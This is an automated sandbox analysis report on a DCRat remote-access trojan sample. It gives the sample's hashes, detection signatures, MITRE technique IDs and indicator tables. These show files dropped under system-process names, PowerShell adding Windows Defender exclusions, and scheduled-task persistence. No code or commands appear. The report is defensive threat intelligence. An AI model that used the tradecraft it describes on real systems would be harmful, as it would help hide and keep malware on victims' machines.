dcrat | 916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9

Analysis

max time kernel
92s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 02:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Size

1.7MB
MD5

7a6337d1705c5b4e696b224c29fc5233
SHA1

5631625b8754ac8e02f9b441a47b229ac37a6cbc
SHA256

916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9
SHA512

7727e5546724c46ac6c481989860e93f7b0e4537a0fc8a1d8595657181c985213f794390f0198a4a69f7b19f999b4bfef5d044f2a6fd2ecc51be119207753efe
SSDEEP

24576:N3QwuLyEbVoCtPreIjNLoN/VNGeSQDx1m17zezKOkCzeJGFUJ:NgwuuEpdDLNwVMeXDL0fdSzAG

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 64 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4852	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1452	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	372	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1484	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2568	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2744	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	628	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2388	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1920	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2956	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4448	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4548	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3956	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4012	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3008	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2440	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	892	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2716	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3316	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4968	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5056	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	464	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4736	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1056	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2480	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3272	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3388	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	208	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1356	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3848	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4620	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5084	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3636	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4440	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3536	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3356	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4996	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4100	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1780	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4876	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3600	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4764	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4940	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	636	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1956	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3380	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3548	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	1028	schtasks.exe	82
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	1028	schtasks.exe	82

DCRat payload 7 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/3832-1-0x00000000004A0000-0x0000000000656000-memory.dmp	dcrat
behavioral2/files/0x0007000000023c8b-30.dat	dcrat
behavioral2/files/0x000a000000023c9b-63.dat	dcrat
behavioral2/files/0x0009000000023c80-74.dat	dcrat
behavioral2/files/0x0009000000023c84-85.dat	dcrat
behavioral2/files/0x0009000000023c9c-108.dat	dcrat
behavioral2/files/0x0009000000023c8f-119.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
548	powershell.exe
4904	powershell.exe
1396	powershell.exe
3616	powershell.exe
4564	powershell.exe
3968	powershell.exe
8	powershell.exe
4300	powershell.exe
1156	powershell.exe
2744	powershell.exe
4760	powershell.exe
3324	powershell.exe
3204	powershell.exe
4712	powershell.exe
552	powershell.exe
736	powershell.exe
2240	powershell.exe
1348	powershell.exe
4712	powershell.exe
5088	powershell.exe
1320	powershell.exe
3440	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	explorer.exe

Executes dropped EXE 3 IoCs

pid	Process
3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
1472	explorer.exe
2132	explorer.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\MailContactsCalendarSync\TextInputHost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\System32\MailContactsCalendarSync\22eafd247d37c3	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Windows\System32\MailContactsCalendarSync\TextInputHost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe

Drops file in Program Files directory 34 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\conhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Google\Chrome\RCX862B.tmp	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Media Player\Skins\886983d96e3d3e	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Windows NT\0a1fd5f707cd16	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Google\Chrome\services.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Common Files\Services\38384e6a620884	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows NT\Accessories\conhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\conhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\088424020bedd6	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\6ccacd8608530f	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows Media Player\Skins\csrss.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Google\Chrome\RCX862A.tmp	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Common Files\Services\SearchApp.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files (x86)\Windows NT\sppsvc.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Media Player\Skins\csrss.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Security\BrowserCore\en-US\f3b6ecef712a24	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\conhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\RCX88BD.tmp	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\7-Zip\Lang\Idle.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Windows NT\sppsvc.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\RCX883F.tmp	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\es-ES\dllhost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows NT\Accessories\088424020bedd6	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files (x86)\Common Files\Services\SearchApp.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Idle.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\Google\Chrome\services.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Google\Chrome\c5b4cb5e9653cc	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\Windows Photo Viewer\es-ES\5940a34987c991	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Program Files\7-Zip\Lang\Idle.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Program Files\7-Zip\Lang\6ccacd8608530f	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\PolicyDefinitions\ja-JP\smss.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Windows\SchCache\lsass.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\Sun\ea1d8f6d871115	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\SchCache\lsass.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\ModemLogs\sihost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\SchCache\6203df4a6bafc7	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\ModemLogs\66fc9ff0ee96c2	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Windows\Sun\upfc.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File opened for modification	C:\Windows\ModemLogs\sihost.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\Sun\upfc.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\PolicyDefinitions\ja-JP\smss.exe	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
File created	C:\Windows\PolicyDefinitions\ja-JP\69ddcba757bf72	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3592	schtasks.exe
4448	schtasks.exe
3316	schtasks.exe
5084	schtasks.exe
3356	schtasks.exe
2900	schtasks.exe
2736	schtasks.exe
4520	schtasks.exe
464	schtasks.exe
2516	schtasks.exe
1356	schtasks.exe
3636	schtasks.exe
1900	schtasks.exe
1956	schtasks.exe
2568	schtasks.exe
4012	schtasks.exe
2440	schtasks.exe
2480	schtasks.exe
2976	schtasks.exe
1388	schtasks.exe
2744	schtasks.exe
4548	schtasks.exe
2716	schtasks.exe
5056	schtasks.exe
636	schtasks.exe
3008	schtasks.exe
3052	schtasks.exe
4992	schtasks.exe
372	schtasks.exe
3956	schtasks.exe
4968	schtasks.exe
628	schtasks.exe
4788	schtasks.exe
2368	schtasks.exe
1668	schtasks.exe
2296	schtasks.exe
1140	schtasks.exe
1452	schtasks.exe
892	schtasks.exe
4432	schtasks.exe
1056	schtasks.exe
3388	schtasks.exe
4852	schtasks.exe
316	schtasks.exe
2936	schtasks.exe
4876	schtasks.exe
3548	schtasks.exe
4440	schtasks.exe
2708	schtasks.exe
2388	schtasks.exe
3020	schtasks.exe
4620	schtasks.exe
2356	schtasks.exe
2956	schtasks.exe
4736	schtasks.exe
3536	schtasks.exe
1780	schtasks.exe
1920	schtasks.exe
4996	schtasks.exe
4764	schtasks.exe
4152	schtasks.exe
1484	schtasks.exe
208	schtasks.exe
3848	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
548	powershell.exe
548	powershell.exe
552	powershell.exe
552	powershell.exe
8	powershell.exe
8	powershell.exe
5088	powershell.exe
5088	powershell.exe
3204	powershell.exe
3204	powershell.exe
3616	powershell.exe
3616	powershell.exe
1396	powershell.exe
1396	powershell.exe
3324	powershell.exe
3324	powershell.exe
4712	powershell.exe
4712	powershell.exe
4904	powershell.exe
4904	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
4904	powershell.exe
548	powershell.exe
552	powershell.exe
8	powershell.exe
3204	powershell.exe
5088	powershell.exe
4712	powershell.exe
3616	powershell.exe

Suspicious use of AdjustPrivilegeToken 26 IoCs

description	pid	Process
Token: SeDebugPrivilege	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	736	powershell.exe
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	1348	powershell.exe
Token: SeDebugPrivilege	1320	powershell.exe
Token: SeDebugPrivilege	4712	powershell.exe
Token: SeDebugPrivilege	1472	explorer.exe
Token: SeDebugPrivilege	2132	explorer.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 3832 wrote to memory of 548	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	109
PID 3832 wrote to memory of 548	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	109
PID 3832 wrote to memory of 4904	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	110
PID 3832 wrote to memory of 4904	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	110
PID 3832 wrote to memory of 5088	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	111
PID 3832 wrote to memory of 5088	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	111
PID 3832 wrote to memory of 3324	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	112
PID 3832 wrote to memory of 3324	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	112
PID 3832 wrote to memory of 3204	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	113
PID 3832 wrote to memory of 3204	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	113
PID 3832 wrote to memory of 4712	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	114
PID 3832 wrote to memory of 4712	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	114
PID 3832 wrote to memory of 1396	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	115
PID 3832 wrote to memory of 1396	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	115
PID 3832 wrote to memory of 3616	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	116
PID 3832 wrote to memory of 3616	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	116
PID 3832 wrote to memory of 552	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	117
PID 3832 wrote to memory of 552	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	117
PID 3832 wrote to memory of 8	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	118
PID 3832 wrote to memory of 8	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	118
PID 3832 wrote to memory of 736	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	119
PID 3832 wrote to memory of 736	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	119
PID 3832 wrote to memory of 3752	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	131
PID 3832 wrote to memory of 3752	3832	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	131
PID 3752 wrote to memory of 5028	3752	cmd.exe	133
PID 3752 wrote to memory of 5028	3752	cmd.exe	133
PID 3752 wrote to memory of 3656	3752	cmd.exe	136
PID 3752 wrote to memory of 3656	3752	cmd.exe	136
PID 3656 wrote to memory of 1320	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	187
PID 3656 wrote to memory of 1320	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	187
PID 3656 wrote to memory of 4300	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	188
PID 3656 wrote to memory of 4300	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	188
PID 3656 wrote to memory of 2240	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	189
PID 3656 wrote to memory of 2240	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	189
PID 3656 wrote to memory of 4564	3656	916a143563e75f975b628b8201560e7e870a7b0ae9684b1d1637884f7f30eeb9.exe	190
